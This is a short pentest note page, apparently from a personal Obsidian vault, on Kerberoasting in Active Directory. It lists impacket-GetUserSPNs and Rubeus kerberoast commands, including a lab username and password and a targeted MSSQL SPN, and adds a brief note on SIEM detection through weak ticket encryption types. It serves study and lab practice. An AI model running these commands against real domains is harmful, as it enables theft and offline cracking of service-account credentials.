kerberoasting

Kerberoasting with Impacket-GetUserSPNs (Not Stealthy)
Command
impacket-GetUserSPNs north.sevenkingdoms.local/robb.stark:sexywolfy -target-domain north.sevenkingdoms.local -request
[!example] Example

Kerberoasting with Rubeus.exe (Not Stealthy)
Command
execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe kerberoast /format:hashcat /simple 
Example

INSERT_IMAGE_HERE

Kerberoasting (targeted) with Rubeus.exe (Stealthy)
Command
execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe kerberoast /spn:MSSQLSvc/lon-sql-1.contoso.com:1433 /simple /nowrap 
Example

INSERT_IMAGE_HERE

Example of the How Weak Encryption Type Can Giveaway Kerberoasting

As visible in the screenshot below. Modern SIEM’S can filter for “TicketEncryptionType” that is associated with weaker encryption to detect Kerberoasting.

Example of the Loudness of Kerberoasting Large Numbers of Users

Related Notes

All Related Notes

TABLE file.ctime as "Created", tags as "Tags"
FROM "New Notes"
WHERE contains(tags, "windows") OR contains(tags, "active-directory")
SORT file.ctime DESC

windows

TABLE file.ctime as "Created", tags as "Tags"
FROM "New Notes"
WHERE contains(tags, "windows")
SORT file.ctime DESC

active-directory

TABLE file.ctime as "Created", tags as "Tags"
FROM "New Notes"
WHERE contains(tags, "active-directory")
SORT file.ctime DESC

📓 Jorkle's Notes

Explorer

kerberoasting

Graph View

Backlinks